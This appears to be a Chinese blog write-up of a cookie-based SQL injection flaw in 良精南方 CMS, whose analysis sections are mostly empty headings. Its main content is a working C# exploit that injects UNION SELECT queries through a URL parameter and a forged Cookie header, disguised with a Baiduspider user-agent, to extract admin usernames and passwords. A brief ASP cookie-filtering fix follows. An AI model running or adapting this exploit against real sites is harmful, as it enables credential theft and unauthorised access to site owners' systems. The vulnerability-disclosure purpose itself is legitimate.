良精南方cms /inc/Check_Sql.asp SQL Injection Based On Cookie
catalog
1. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考
1. 漏洞描述
Relevant Link:
2. 漏洞触发条件
0x1: POC
using System; using System.Collections; using System.Net; using System.Text; using System.Text.RegularExpressions; namespace windowsmanger { internal class ljnanfang { public string exp(string url) { string result; try { string exps = "/NewsType.asp?SmallClass='%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20%66%72%6F%6D%20%61%64%6D%69%6E"; string urls = url; if (!urls.Contains("http://")) { urls = "http://" + urls; } string shuju = new WebClient { Headers = { { "user-agent", "Baiduspider" } }, Encoding = Encoding.Default }.DownloadString(urls + exps).Replace("\r", "").Replace("\n", ""); int a = shuju.IndexOf("title="); int b = shuju.IndexOf("target="); string jieguo = shuju.Substring(a + 8, b - a - 11); result = jieguo; } catch { string jieguosd = this.isshuju(url); if (jieguosd != "网站未发现安全隐患") { result = jieguosd; } else { result = "网站未发现安全隐患"; } } return result; } public string isshuju(string url) { string result; try { string exps = "/shownews.asp"; string shuju = new WebClient { Proxy = null, Encoding = Encoding.Default, Headers = { { "user-agent", "Baiduspider" }, { "Cookie", "ASPSESSIONIDCACQBSAT=JGGFLMFDNIDGIFLOJHNBMGBK;id=59+union+select+1,username,password,4,5,6,7,8,9,10+from+admin" } } }.DownloadString(url + exps); MatchCollection matcha = new Regex("<td.height=.50..*?align=.center..class=..*?.>(?<admin>.*?)</td>\\r(?s).*?</font>次.*?>\\r.*?\\r.*?\\r.*?\\r(?<pass>.*?)</td>", RegexOptions.None).Matches(shuju); IEnumerator enumerator = matcha.GetEnumerator(); try { if (enumerator.MoveNext()) { Match match = (Match)enumerator.Current; string bb = match.Groups["admin"].ToString().Replace(" ", ""); string cc = match.Groups["pass"].ToString().Replace(" ", ""); result = bb + " " + cc; return result; } } finally { IDisposable disposable = enumerator as IDisposable; if (disposable != null) { disposable.Dispose(); } } result = "网站未发现安全隐患"; } catch { result = "网站未发现安全隐患"; } return result; } } }
3. 漏洞影响范围
4. 漏洞代码分析
Cookie注入
5. 防御方法
/inc/Check_Sql.asp
On Error Resume Next '''' Chk_badword=split(Query_Badword,"∥") For Each Fy_Get In Request.Cookies For i=0 To Ubound(Chk_badword) If Instr(LCase(Request.Cookies(Fy_Get)),Chk_badword(i))<>0 Then Response.End End If Next Next ''''
官方最新的代码中包含有对POST、GET的过滤代码,需要在这个基础上加上Cookie注入防御
6. 攻防思考
Copyright (c) 2015 LittleHann All rights reserved
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· AI与.NET技术实操系列(二):开始使用ML.NET
· 记一次.NET内存居高不下排查解决与启示
· 探究高空视频全景AR技术的实现原理
· 理解Rust引用及其生命周期标识(上)
· 浏览器原生「磁吸」效果!Anchor Positioning 锚点定位神器解析
· DeepSeek 开源周回顾「GitHub 热点速览」
· 物流快递公司核心技术能力-地址解析分单基础技术分享
· .NET 10首个预览版发布:重大改进与新特性概览!
· AI与.NET技术实操系列(二):开始使用ML.NET
· 单线程的Redis速度为什么快?